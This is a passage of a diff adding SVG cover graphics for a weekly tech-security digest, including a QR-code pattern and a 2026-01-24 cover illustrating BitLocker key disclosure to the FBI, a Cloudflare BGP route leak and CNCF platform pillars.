6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h1v1h-1zM40 6h1v1h-1zM42 6h7v1h-7zM10 7h1v1h-1zM16 7h1v1h-1zM21 7h2v1h-2zM26 7h2v1h-2zM29 7h2v1h-2zM32 7h2v1h-2zM35 7h1v1h-1zM37 7h3v1h-3zM0 8h1v1h-1zM3 8h8v1h-8zM12 8h5v1h-5zM22 8h5v1h-5zM28 8h2v1h-2zM34 8h3v1h-3zM38 8h4v1h-4zM44 8h1v1h-1zM46 8h3v1h-3zM0 9h3v1h-3zM7 9h1v1h-1zM10 9h5v1h-5zM17 9h5v1h-5zM25 9h7v1h-7zM33 9h3v1h-3zM37 9h7v1h-7zM46 9h2v1h-2zM0 10h2v1h-2zM4 10h1v1h-1zM6 10h2v1h-2zM9 10h1v1h-1zM11 10h1v1h-1zM16 10h1v1h-1zM18 10h2v1h-2zM22 10h1v1h-1zM25 10h1v1h-1zM27 10h3v1h-3zM31 10h1v1h-1zM34 10h3v1h-3zM43 10h1v1h-1zM45 10h4v1h-4zM2 11h2v1h-2zM5 11h1v1h-1zM8 11h2v1h-2zM13 11h1v1h-1zM15 11h2v1h-2zM19 11h4v1h-4zM24 11h3v1h-3zM29 11h2v1h-2zM32 11h1v1h-1zM34 11h1v1h-1zM37 11h1v1h-1zM40 11h2v1h-2zM43 11h4v1h-4zM1 12h1v1h-1zM4 12h3v1h-3zM8 12h1v1h-1zM12 12h3v1h-3zM16 12h1v1h-1zM18 12h1v1h-1zM20 12h1v1h-1zM22 12h1v1h-1zM24 12h1v1h-1zM27 12h2v1h-2zM30 12h1v1h-1zM32 12h1v1h-1zM36 12h3v1h-3zM41 12h1v1h-1zM44 12h2v1h-2zM1 13h2v1h-2zM4 13h1v1h-1zM7 13h1v1h-1zM10 13h1v1h-1zM12 13h2v1h-2zM15 13h6v1h-6zM23 13h2v1h-2zM26 13h2v1h-2zM29 13h2v1h-2zM33 13h1v1h-1zM36 13h1v1h-1zM38 13h2v1h-2zM42 13h2v1h-2zM45 13h1v1h-1zM47 13h1v1h-1zM2 14h3v1h-3zM6 14h4v1h-4zM11 14h1v1h-1zM14 14h5v1h-5zM22 14h1v1h-1zM25 14h1v1h-1zM33 14h1v1h-1zM35 14h3v1h-3zM40 14h1v1h-1zM46 14h3v1h-3zM2 15h1v1h-1zM8 15h1v1h-1zM11 15h3v1h-3zM15 15h4v1h-4zM20 15h1v1h-1zM22 15h1v1h-1zM26 15h4v1h-4zM32 15h4v1h-4zM42 15h2v1h-2zM45 15h2v1h-2zM48 15h1v1h-1zM1 16h1v1h-1zM3 16h1v1h-1zM5 16h3v1h-3zM10 16h2v1h-2zM15 16h1v1h-1zM19 16h2v1h-2zM24 16h2v1h-2zM27 16h1v1h-1zM31 16h2v1h-2zM34 16h1v1h-1zM36 16h5v1h-5zM44 16h1v1h-1zM46 16h2v1h-2zM1 17h1v1h-1zM5 17h1v1h-1zM9 17h1v1h-1zM11 17h1v1h-1zM14 17h1v1h-1zM17 17h3v1h-3zM22 17h1v1h-1zM25 17h1v1h-1zM27 17h5v1h-5zM33 17h2v1h-2zM37 17h1v1h-1zM39 17h4v1h-4zM44 17h3v1h-3zM0 18h3v1h-3zM4 18h4v1h-4zM9 18h2v1h-2zM12 18h1v1h-1zM16 18h1v1h-1zM24 18h1v1h-1zM26 18h7v1h-7zM35 18h2v1h-2zM38 18h1v1h-1zM40 18h2v1h-2zM43 18h4v1h-4zM48 18h1v1h-1zM2 19h1v1h-1zM4 19h2v1h-2zM9 19h1v1h-1zM11 19h2v1h-2zM14 19h1v1h-1zM23 19h1v1h-1zM25 19h2v1h-2zM28 19h2v1h-2zM32 19h3v1h-3zM37 19h3v1h-3zM41 19h2v1h-2zM45 19h1v1h-1zM0 20h1v1h-1zM2 20h1v1h-1zM6 20h1v1h-1zM13 20h2v1h-2zM16 20h6v1h-6zM23 20h2v1h-2zM28 20h1v1h-1zM35 20h2v1h-2zM38 20h2v1h-2zM42 20h2v1h-2zM48 20h1v1h-1zM0 21h1v1h-1zM3 21h1v1h-1zM8 21h2v1h-2zM15 21h1v1h-1zM17 21h1v1h-1zM19 21h2v1h-2zM22 21h2v1h-2zM26 21h1v1h-1zM28 21h1v1h-1zM30 21h2v1h-2zM33 21h2v1h-2zM36 21h8v1h-8zM46 21h2v1h-2zM0 22h1v1h-1zM2 22h1v1h-1zM4 22h7v1h-7zM15 22h3v1h-3zM19 22h2v1h-2zM22 22h5v1h-5zM29 22h1v1h-1zM31 22h5v1h-5zM39 22h7v1h-7zM48 22h1v1h-1zM1 23h1v1h-1zM3 23h2v1h-2zM8 23h1v1h-1zM11 23h1v1h-1zM15 23h3v1h-3zM19 23h4v1h-4zM26 23h2v1h-2zM30 23h2v1h-2zM34 23h2v1h-2zM38 23h1v1h-1zM40 23h1v1h-1zM44 23h1v1h-1zM46 23h1v1h-1zM3 24h2v1h-2zM6 24h1v1h-1zM8 24h1v1h-1zM11 24h1v1h-1zM13 24h2v1h-2zM17 24h1v1h-1zM21 24h2v1h-2zM24 24h1v1h-1zM26 24h1v1h-1zM28 24h1v1h-1zM30 24h1v1h-1zM32 24h2v1h-2zM36 24h3v1h-3zM40 24h1v1h-1zM42 24h1v1h-1zM44 24h1v1h-1zM47 24h2v1h-2zM1 25h4v1h-4zM8 25h3v1h-3zM14 25h4v1h-4zM19 25h4v1h-4zM26 25h1v1h-1zM29 25h2v1h-2zM32 25h2v1h-2zM35 25h2v1h-2zM38 25h1v1h-1zM40 25h1v1h-1zM44 25h3v1h-3zM1 26h10v1h-10zM13 26h4v1h-4zM18 26h2v1h-2zM22 26h5v1h-5zM31 26h3v1h-3zM35 26h2v1h-2zM39 26h6v1h-6zM48 26h1v1h-1zM2 27h2v1h-2zM5 27h1v1h-1zM7 27h1v1h-1zM9 27h3v1h-3zM20 27h2v1h-2zM24 27h3v1h-3zM29 27h2v1h-2zM35 27h1v1h-1zM37 27h1v1h-1zM41 27h2v1h-2zM44 27h3v1h-3zM1 28h1v1h-1zM3 28h1v1h-1zM5 28h2v1h-2zM9 28h2v1h-2zM13 28h1v1h-1zM16 28h2v1h-2zM20 28h1v1h-1zM24 28h1v1h-1zM26 28h1v1h-1zM31 28h3v1h-3zM36 28h4v1h-4zM41 28h2v1h-2zM44 28h1v1h-1zM46 28h1v1h-1zM48 28h1v1h-1zM1 29h2v1h-2zM4 29h2v1h-2zM8 29h1v1h-1zM10 29h3v1h-3zM15 29h2v1h-2zM18 29h3v1h-3zM22 29h3v1h-3zM27 29h1v1h-1zM30 29h2v1h-2zM33 29h3v1h-3zM37 29h1v1h-1zM39 29h1v1h-1zM41 29h3v1h-3zM46 29h2v1h-2zM1 30h3v1h-3zM5 30h2v1h-2zM9 30h1v1h-1zM11 30h4v1h-4zM16 30h1v1h-1zM19 30h1v1h-1zM24 30h1v1h-1zM26 30h1v1h-1zM29 30h1v1h-1zM31 30h3v1h-3zM35 30h2v1h-2zM38 30h1v1h-1zM40 30h1v1h-1zM42 30h1v1h-1zM48 30h1v1h-1zM0 31h2v1h-2zM3 31h3v1h-3zM7 31h2v1h-2zM10 31h1v1h-1zM13 31h1v1h-1zM15 31h1v1h-1zM17 31h2v1h-2zM21 31h1v1h-1zM24 31h2v1h-2zM29 31h1v1h-1zM32 31h1v1h-1zM35 31h1v1h-1zM39 31h2v1h-2zM45 31h1v1h-1zM47 31h2v1h-2zM6 32h2v1h-2zM15 32h1v1h-1zM18 32h3v1h-3zM24 32h1v1h-1zM33 32h1v1h-1zM35 32h2v1h-2zM38 32h2v1h-2zM41 32h1v1h-1zM43 32h2v1h-2zM2 33h3v1h-3zM11 33h1v1h-1zM15 33h1v1h-1zM17 33h8v1h-8zM26 33h1v1h-1zM29 33h1v1h-1zM31 33h1v1h-1zM33 33h3v1h-3zM37 33h2v1h-2zM40 33h2v1h-2zM43 33h5v1h-5zM1 34h1v1h-1zM3 34h2v1h-2zM6 34h1v1h-1zM8 34h1v1h-1zM12 34h1v1h-1zM14 34h1v1h-1zM17 34h2v1h-2zM21 34h2v1h-2zM24 34h3v1h-3zM28 34h3v1h-3zM32 34h3v1h-3zM37 34h3v1h-3zM41 34h3v1h-3zM45 34h1v1h-1zM48 34h1v1h-1zM0 35h1v1h-1zM2 35h1v1h-1zM4 35h1v1h-1zM7 35h1v1h-1zM10 35h2v1h-2zM15 35h3v1h-3zM21 35h4v1h-4zM26 35h2v1h-2zM32 35h4v1h-4zM38 35h2v1h-2zM41 35h1v1h-1zM43 35h6v1h-6zM1 36h2v1h-2zM4 36h1v1h-1zM6 36h2v1h-2zM10 36h1v1h-1zM12 36h1v1h-1zM14 36h1v1h-1zM17 36h1v1h-1zM19 36h2v1h-2zM23 36h1v1h-1zM28 36h2v1h-2zM32 36h3v1h-3zM36 36h5v1h-5zM48 36h1v1h-1zM0 37h1v1h-1zM5 37h1v1h-1zM9 37h4v1h-4zM14 37h5v1h-5zM20 37h1v1h-1zM22 37h3v1h-3zM28 37h4v1h-4zM33 37h1v1h-1zM36 37h3v1h-3zM40 37h2v1h-2zM43 37h2v1h-2zM1 38h1v1h-1zM5 38h2v1h-2zM9 38h3v1h-3zM15 38h4v1h-4zM20 38h1v1h-1zM22 38h3v1h-3zM32 38h1v1h-1zM36 38h4v1h-4zM41 38h2v1h-2zM44 38h1v1h-1zM46 38h3v1h-3zM1 39h3v1h-3zM11 39h5v1h-5zM19 39h1v1h-1zM26 39h1v1h-1zM29 39h3v1h-3zM37 39h1v1h-1zM39 39h1v1h-1zM41 39h3v1h-3zM46 39h3v1h-3zM0 40h3v1h-3zM6 40h2v1h-2zM9 40h2v1h-2zM18 40h2v1h-2zM22 40h5v1h-5zM30 40h3v1h-3zM36 40h2v1h-2zM39 40h9v1h-9zM8 41h1v1h-1zM10 41h1v1h-1zM13 41h2v1h-2zM16 41h1v1h-1zM22 41h1v1h-1zM26 41h2v1h-2zM30 41h1v1h-1zM33 41h2v1h-2zM37 41h1v1h-1zM39 41h2v1h-2zM44 41h1v1h-1zM46 41h1v1h-1zM0 42h7v1h-7zM8 42h1v1h-1zM13 42h7v1h-7zM21 42h2v1h-2zM24 42h1v1h-1zM26 42h2v1h-2zM29 42h1v1h-1zM32 42h1v1h-1zM35 42h2v1h-2zM38 42h1v1h-1zM40 42h1v1h-1zM42 42h1v1h-1zM44 42h1v1h-1zM47 42h2v1h-2zM0 43h1v1h-1zM6 43h1v1h-1zM8 43h2v1h-2zM14 43h4v1h-4zM19 43h2v1h-2zM22 43h1v1h-1zM26 43h1v1h-1zM28 43h4v1h-4zM34 43h2v1h-2zM39 43h2v1h-2zM44 43h2v1h-2zM0 44h1v1h-1zM2 44h3v1h-3zM6 44h1v1h-1zM8 44h2v1h-2zM12 44h2v1h-2zM16 44h3v1h-3zM22 44h5v1h-5zM28 44h3v1h-3zM34 44h1v1h-1zM36 44h1v1h-1zM38 44h1v1h-1zM40 44h6v1h-6zM48 44h1v1h-1zM0 45h1v1h-1zM2 45h3v1h-3zM6 45h1v1h-1zM8 45h2v1h-2zM11 45h2v1h-2zM18 45h1v1h-1zM20 45h4v1h-4zM25 45h1v1h-1zM27 45h1v1h-1zM29 45h2v1h-2zM33 45h2v1h-2zM37 45h2v1h-2zM41 45h1v1h-1zM43 45h1v1h-1zM45 45h2v1h-2zM48 45h1v1h-1zM0 46h1v1h-1zM2 46h3v1h-3zM6 46h1v1h-1zM11 46h4v1h-4zM19 46h2v1h-2zM24 46h1v1h-1zM27 46h1v1h-1zM29 46h1v1h-1zM32 46h3v1h-3zM37 46h2v1h-2zM43 46h3v1h-3zM47 46h1v1h-1zM0 47h1v1h-1zM6 47h1v1h-1zM9 47h1v1h-1zM12 47h1v1h-1zM14 47h1v1h-1zM16 47h1v1h-1zM21 47h2v1h-2zM25 47h7v1h-7zM33 47h3v1h-3zM39 47h2v1h-2zM42 47h1v1h-1zM45 47h4v1h-4zM0 48h7v1h-7zM8 48h2v1h-2zM12 48h2v1h-2zM17 48h2v1h-2zM22 48h1v1h-1zM25 48h4v1h-4zM30 48h1v1h-1zM32 48h1v1h-1zM34 48h1v1h-1zM36 48h3v1h-3zM40 48h5v1h-5zM46 48h1v1h-1zM48 48h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
+</svg>

--- a/assets/images/2026-01-24-Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker.svg
+++ b/assets/images/2026-01-24-Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker.svg
@@ -1,0 +1,381 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: Microsoft BitLocker keys handed to FBI sparks encryption trust debate, Cloudflare BGP Route Leak RPKI analysis, CNCF Autonomous Enterprise 4 platform control pillars 2026, Docker identity crisis and container ecosystem future">
+<!-- profile: high-quality-cover (L13 Callouts, research-based, batch1-locked) -->
+<title>Weekly digest 2026-01-24: BitLocker FBI Key, Cloudflare Route Leak, CNCF Autonomous Enterprise, Docker 2026</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="55%" stop-color="#0D1530"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="cardA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A0F16"/>
+    <stop offset="100%" stop-color="#1E0A12"/>
+  </linearGradient>
+  <linearGradient id="cardB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A180A"/>
+    <stop offset="100%" stop-color="#1E1006"/>
+  </linearGradient>
+  <linearGradient id="cardC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0E2038"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <linearGradient id="cardD" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#14143A"/>
+    <stop offset="100%" stop-color="#0D0D30"/>
+  </linearGradient>
+  <linearGradient id="keyGrad" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#E63946"/>
+    <stop offset="100%" stop-color="#9B1C28"/>
+  </linearGradient>
+  <linearGradient id="routeGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#FFB703"/>
+    <stop offset="100%" stop-color="#E88C00"/>
+  </linearGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFB703" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#FFB703" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowPurple" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#8B5CF6" stop-opacity="0.55"/>
+    <stop offset="100%" stop-color="#8B5CF6" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
+
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
+
+<circle cx="320" cy="220" r="120" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="900" cy="220" r="120" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.45;0.8;0.45" dur="5.6s" repeatCount="indefinite"/>
+</circle>
+<circle cx="320" cy="480" r="120" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.4;0.75;0.4" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+<circle cx="900" cy="480" r="120" fill="url(#glowPurple)">
+  <animate attributeName="opacity" values="0.45;0.8;0.45" dur="6.2s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header stripe -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.92"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.01.24</text>
+<rect x="0" y="54" width="1200" height="2" fill="#F87171" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.8s" repeatCount="indefinite"/>
+</rect>
+
+<!-- CARD 01: BitLocker FBI (top-left) — CRITICAL / Red -->
+<g transform="translate(32,80)">
+  <rect x="0" y="0" width="564" height="248" rx="14" fill="url(#cardA)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" fill="#E63946"/>
+  <rect x="0" y="0" width="564" height="4" fill="#E63946" opacity="0.7"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#E63946" opacity="0.2"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#F87171">01</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F87171" letter-spacing="2.4">CRITICAL  /  ENCRYPTION</text>
+    <text x="74" y="58" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">BitLocker Keys Handed to FBI</text>
+  </g>
+  <text x="20" y="102" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="500" fill="#FBB6BD">Microsoft discloses key escrow access — HN 705pts, 463 comments</text>
+
+  <!-- Lock illustration -->
+  <g transform="translate(26,118)" filter="url(#softShadow)">
+    <!-- lock body -->
+    <rect x="0" y="28" width="64" height="52" rx="8" fill="#1E0A12" stroke="#E63946" stroke-width="2"/>
+    <!-- shackle (open/cracked) -->
+    <path d="M16 28 L16 12 Q16 0 32 0 Q48 0 48 12 L48 28" stroke="#F87171" stroke-width="3" fill="none" stroke-dasharray="6 4">
+      <animate attributeName="stroke-dashoffset" values="0;-20" dur="2.2s" repeatCount="indefinite"/>
+    </path>
+    <!-- keyhole -->
+    <circle cx="32" cy="48" r="7" fill="#E63946" opacity="0.9"/>
+    <rect x="28" y="50" width="8" height="12" rx="2" fill="#E63946" opacity="0.9"/>
+    <!-- crack lines -->
+    <line x1="32" y1="28" x2="22" y2="42" stroke="#F87171" stroke-width="1.4" opacity="0.8"/>
+    <line x1="32" y1="28" x2="42" y2="38" stroke="#F87171" stroke-width="1.4" opacity="0.8"/>
+  </g>
+
+  <!-- FBI badge / key transfer arrow -->
+  <g transform="translate(118,124)" filter="url(#softShadow)">
+    <!-- Microsoft box -->
+    <rect x="0" y="8" width="72" height="36" rx="6" fill="#0D1F3C" stroke="#8FB8FF" stroke-width="1.2"/>
+    <text x="36" y="30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="800" fill="#8FB8FF">MICROSOFT</text>
+    <!-- arrow -->
+    <path d="M76 26 L106 26" stroke="#E63946" stroke-width="2.2" fill="none">
+      <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.4s" repeatCount="indefinite"/>
+    </path>
+    <polygon points="106,22 114,26 106,30" fill="#E63946"/>
+    <!-- FBI box -->
+    <rect x="118" y="8" width="60" height="36" rx="6" fill="#1A0008" stroke="#E63946" stroke-width="1.6"/>
+    <text x="148" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="900" fill="#F87171">FBI</text>
+    <!-- key icon on arrow -->
+    <g transform="translate(86,14)">
+      <circle r="6" fill="url(#keyGrad)" stroke="#F87171" stroke-width="1"/>
+      <rect x="6" y="-2" width="12" height="4" rx="1" fill="url(#keyGrad)"/>
+      <rect x="14" y="2" width="3" height="4" rx="1" fill="#F87171"/>
+      <rect x="10" y="2" width="3" height="3" rx="1" fill="#F87171"/>
+    </g>
+    <!-- 3 laptops below -->
+    <g transform="translate(0,52)">
+      <rect x="4" y="0" width="40" height="26" rx="3" fill="#1E0A12" stroke="#F87171" stroke-width="1"/>
+      <rect x="4" y="26" width="40" height="4" rx="1" fill="#3A0A14"/>
+      <text x="24" y="17" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="700" fill="#F87171">LAPTOP x3</text>
+      <circle cx="24" cy="32" r="1.5" fill="#F87171" opacity="0.7"/>
+    </g>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(430,130)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E0A14" stroke="#E63946" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#F87171">HN POINTS</text>
+    <text x="60" y="64" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="34" font-weight="900" fill="#F5F7FA">705</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FBB6BD">463 comments</text>
+  </g>
+
+  <!-- spark pulses -->
+  <g fill="#F87171">
+    <circle cx="530" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.8s" repeatCount="indefinite"/></circle>
+    <circle cx="546" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" begin="0.3s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
+
+<!-- CARD 02: Cloudflare BGP Route Leak (top-right) — HIGH / Amber -->
+<g transform="translate(612,80)">
+  <rect x="0" y="0" width="556" height="248" rx="14" fill="url(#cardB)" stroke="#FFB703" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" fill="#FFB703"/>
+  <rect x="0" y="0" width="556" height="4" fill="#FFB703" opacity="0.7"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#FFB703" opacity="0.2"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#FFB703">02</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFB703" letter-spacing="2.4">HIGH  /  BGP SECURITY</text>
+    <text x="74" y="58" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Cloudflare BGP Route Leak</text>
+  </g>
+  <text x="20" y="102" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="500" fill="#FFD58A">Jan 22 incident — RPKI response analysis</text>
+
+  <!-- Network route diagram: leaked prefix -->
+  <g transform="translate(26,118)" filter="url(#softShadow)">
+    <!-- AS nodes -->
+    <circle cx="30" cy="50" r="22" fill="#1E1006" stroke="#FFB703" stroke-width="1.8"/>
+    <text x="30" y="54" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FFD58A">CF AS</text>
+    <!-- bad route arrow -->
+    <path d="M54 38 Q90 10 116 38" stroke="#E63946" stroke-width="2" fill="none" stroke-dasharray="5 3">
+      <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.2s" repeatCount="indefinite"/>
+    </path>
+    <!-- bad AS box -->
+    <rect x="116" y="22" width="52" height="32" rx="5" fill="#2A0F0A" stroke="#E63946" stroke-width="1.4"/>
+    <text x="142" y="41" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#F87171">LEAK AS</text>
+    <!-- RPKI shield -->
+    <g transform="translate(80,52)">
+      <path d="M14 0 L28 6 L28 20 Q28 30 14 36 Q0 30 0 20 L0 6 Z" fill="#0E2038" stroke="#FFB703" stroke-width="1.6"/>
+      <text x="14" y="22" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FFD58A">RPKI</text>
+      <text x="14" y="32" text-anchor="middle" font-family="Inter, monospace" font-size="7" fill="#FFD58A">ROA</text>
+    </g>
+    <!-- correct route -->
+    <path d="M54 62 L76 62" stroke="#FFB703" stroke-width="1.8" fill="none"/>
+    <polygon points="76,58 84,62 76,66" fill="#FFB703"/>
+  </g>
+
+  <!-- BGP stats -->
+  <g transform="translate(220,126)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="110" height="78" rx="8" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+    <text x="55" y="20" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="700" letter-spacing="1.5" fill="#FFB703">TIMELINE</text>
+    <text x="10" y="40" font-family="Inter, monospace" font-size="9" fill="#FFD58A">Jan 22 ~14:00 UTC</text>
+    <text x="10" y="56" font-family="Inter, monospace" font-size="9" fill="#FFD58A">Leak detected</text>
+    <text x="10" y="70" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#F5F7FA">RPKI filtered</text>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(420,130)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E1006" stroke="#FFB703" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#FFB703">BGP RISK</text>
+    <text x="60" y="62" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="26" font-weight="900" fill="#F5F7FA">RPKI</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FFD58A">route origin auth</text>
+  </g>
+</g>
+
+<!-- CARD 03: CNCF Autonomous Enterprise (bottom-left) — MEDIUM / Blue -->
+<g transform="translate(32,348)">
+  <rect x="0" y="0" width="564" height="242" rx="14" fill="url(#cardC)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" fill="#3A86FF"/>
+  <rect x="0" y="0" width="564" height="4" fill="#3A86FF" opacity="0.7"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#3A86FF" opacity="0.2"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#8FB8FF">03</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">MEDIUM  /  PLATFORM ENG</text>
+    <text x="74" y="58" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">CNCF Autonomous Enterprise</text>
+  </g>
+  <text x="20" y="102" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="500" fill="#BFC9D9">4 platform control pillars — 2026 forecast</text>
+
+  <!-- 4 pillars visual -->
+  <g transform="translate(26,118)" filter="url(#softShadow)">
+    <!-- Pillar 1 -->
+    <rect x="0" y="0" width="82" height="100" rx="6" fill="#0E2038" stroke="#3A86FF" stroke-width="1.2"/>
+    <rect x="0" y="0" width="82" height="6" rx="3" fill="#3A86FF" opacity="0.8"/>
+    <text x="41" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="18" font-weight="900" fill="#3A86FF">1</text>
+    <text x="41" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" font-weight="700" fill="#8FB8FF">SECURITY</text>
+    <text x="41" y="68" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">Zero-Trust</text>
+    <text x="41" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">Posture</text>
+    <!-- Pillar 2 -->
+    <rect x="90" y="0" width="82" height="100" rx="6" fill="#0E2038" stroke="#3A86FF" stroke-width="1.2"/>
+    <rect x="90" y="0" width="82" height="6" rx="3" fill="#3A86FF" opacity="0.8"/>
